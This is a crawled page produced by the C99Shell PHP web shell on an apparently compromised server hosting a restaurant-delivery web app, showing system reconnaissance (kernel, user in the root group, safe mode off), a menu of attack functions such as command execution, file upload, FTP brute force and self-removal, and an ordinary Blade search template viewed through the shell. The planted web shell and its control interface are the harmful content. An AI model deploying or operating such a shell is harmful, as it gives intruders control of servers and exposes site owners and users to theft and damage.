!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/wataxi.picotech.app/public_html/resources/views/layouts/headers/   drwxr-xr-x
Free 28.97 GB of 117.98 GB (24.56%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     search.blade.php (3.65 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<section class="section-profile-cover section-shaped my-0 d-none d-md-none d-lg-block d-lx-block">
    <div class="row">
        <div class="col-xl-6 col-lg-6 col-md-6 col-sm-7"></div>
        <div class="col-xl-6 col-lg-6 col-md-6 col-sm-5 my-5">
            <!-- Circles background -->
            <img class="bg-image" src="{{ config('global.search') }}" style="width: 100%;">

        </div>
      </div>
</section>
<section class="section">
    <div class="container mt--350">
        <h1><?php echo config('global.header_title'?></h1>
        <p><?php echo config('global.header_subtitle'?></p>
        @if(config('settings.is_demo'))
                    <div class="row">
                        <div class=""><div class="blob red"></div></div>
                        <div class=""> <span class="description "><strong>Demo info</strong>: Our demo restorants deliver in: <a href="?location=Bronx,NY,USA">Bronx</a>, <a href="?location=Manhattan, New York, NY, USA">Manhattn</a>, <a href="?location=Queens, New York, NY, USA">Queens</a>, <a href="?location=Brooklyn, New York, NY, USA">Brooklyn</a></span></div>
                    </div>
                    <br />
                @endif
        <div class="row">
            <div class="col-md-4">
                @if(config('settings.enable_location_search'))
                <form action="{{ route('front') }}">
                    <div class="form-group{{ $errors->has('location') ? ' has-danger' : '' }}">
                        <div class="input-group mb-4">
                            <input class="form-control" name="location" id="txtlocation" value="{{ $lastaddress }}" placeholder="{{ __('Enter your street or address') }}" type="text" required>
                            <div type="button" class="input-group-append button">
                                <span class="input-group-text"><i id="search_location" class="fa fa-map-pin" data-toggle="tooltip" data-placement="top" title="{{ __('Get my current location')}}"></i></span>
                            </div>
                            @if ($errors->has('location'))
                                <span class="invalid-feedback" role="alert">
                                    <strong>{{ $errors->first('location') }}</strong>
                                </span>
                            @endif
                        </div>
                    </div>
                    <input type="hidden" value="" name="expedition" id="expedition"/>
                </div>
                    <div class="col-md-4">
                        <button type="submit" class="btn btn-danger btn_delivery_pickup" id="delivery">{{ __('Delivery') }}</button>
                        <span>{{ __('or') }}</span>&nbsp;&nbsp;
                        <button type="submit" class="btn btn-danger btn_delivery_pickup" id="pickup">{{ __('Pickup') }}</button>
                    </div>
                </form>
                @else

                <form>
                    <div class="form-group">
                        <div class="input-group mb-4">
                        <div class="input-group-prepend">
                            <span class="input-group-text"><i class="ni ni-basket"></i></span>
                        </div>
                        <input name="q" class="form-control lg" value="{{ request()->get('q') }}" placeholder="{{ __ ('Search') }}" type="text">
                        </div>
                    </div>
                </div>
                    <div class="col-md-4">
                        <button type="submit" class="btn btn-danger">{{ __('Find your meal') }}</button>
                    </div>
                </form>
                @endif
        </div>
    </div>
</section>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0039 ]--